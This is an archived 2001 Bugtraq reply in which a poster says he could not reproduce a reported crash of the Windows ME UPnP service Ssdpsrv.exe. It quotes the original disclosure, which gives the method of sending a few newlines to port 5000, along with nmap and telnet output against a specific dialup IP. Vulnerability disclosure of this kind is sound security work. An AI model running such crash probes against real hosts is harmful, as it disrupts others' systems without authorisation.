Re: Ssdpsrv.exe in WindowsME

From: ~ (resoat_private)
Date: Sat Oct 20 2001 - 03:02:10 PDT

Next message: Simon Kornblith: "Re: Minor IE vulnerability: about: URLs"

Previous message: ghandi: "Re: OSX remote root *more info*"
In reply to: milo omega: "Ssdpsrv.exe in WindowsME"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

One of my PCs runs Windows ME so I tried to replicate the crash but to no
avail.
I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but
Ssdpsrv.exe does not crash.
I know Microsoft aren't always that great at security but making a program
that crashes after 3 new line commands seems a little silly even for them
:-)
The ME install was a custom install and the service was running so I think
there's a definite link there.

Rob Mears
http://www.securitywriters.org





----- Original Message -----
From: "milo omega" <mtwoarat_private>
To: <bugtraqat_private>
Sent: Thursday, October 18, 2001 1:46 AM
Subject: Ssdpsrv.exe in WindowsME


> By connecting to a computer running Ssdpsrv you are able to crash the
> Ssdpsrv server.
>
> Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
> This service comes standard with the WindowsME installation.
>
> The Ssdpsrv.exe server is started at boot.
> Here is the registry entry:
>   KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
> Here is the file that starts the server:
>   c:\windows\system\ssdpsrv.exe
>
> For information about UPnP go here:
>   http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
> Upon running a scan on a computer running the server I get the following:
> <snip>
>   bash-2.05$ nmap -sT 165.121.234.217
>   Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
>   Interesting ports on user-2injqmp.dialup.mindspring.com
(165.121.234.217):
>   (The 1547 ports scanned but not shown below are in state: closed)
>   Port       State       Service
>   139/tcp    open        netbios-ssn
>   5000/tcp   open        fics
>   Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
> </snap>
>
> Method to crash Ssdpsrv:
>   Connect to the computer on port 5000.
>   Send 3 to 5 newline characters.
>   You then get an error and are disconnected.
> <snip>
>   bash-2.05$ telnet 165.121.234.217 5000
>   Trying 165.121.234.217...
>   Connected to 165.121.234.217.
>   Escape character is '^]'.
>
>
>
>   HTTP/1.1 400 Bad Request
>
>   Connection closed by foreign host.
>   bash-2.05$
> </snap>
>
> Here is the error caused by the crash:
>   Ssdpsrv has caused an error in MSVCRT.DLL.
>   Ssdpsrv will now close.
>   If you continue to experience problems,
>   try restarting your computer.
>
> This causes the server crash and closes port 5000.
> Either you must restart the server by manually running ssdpsrv.exe
> or reboot.
>
> shouts to pulltheplug #c.
> :o
>
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
>

Next message: Simon Kornblith: "Re: Minor IE vulnerability: about: URLs"
Previous message: ghandi: "Re: OSX remote root *more info*"
In reply to: milo omega: "Ssdpsrv.exe in WindowsME"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Oct 20 2001 - 08:16:46 PDT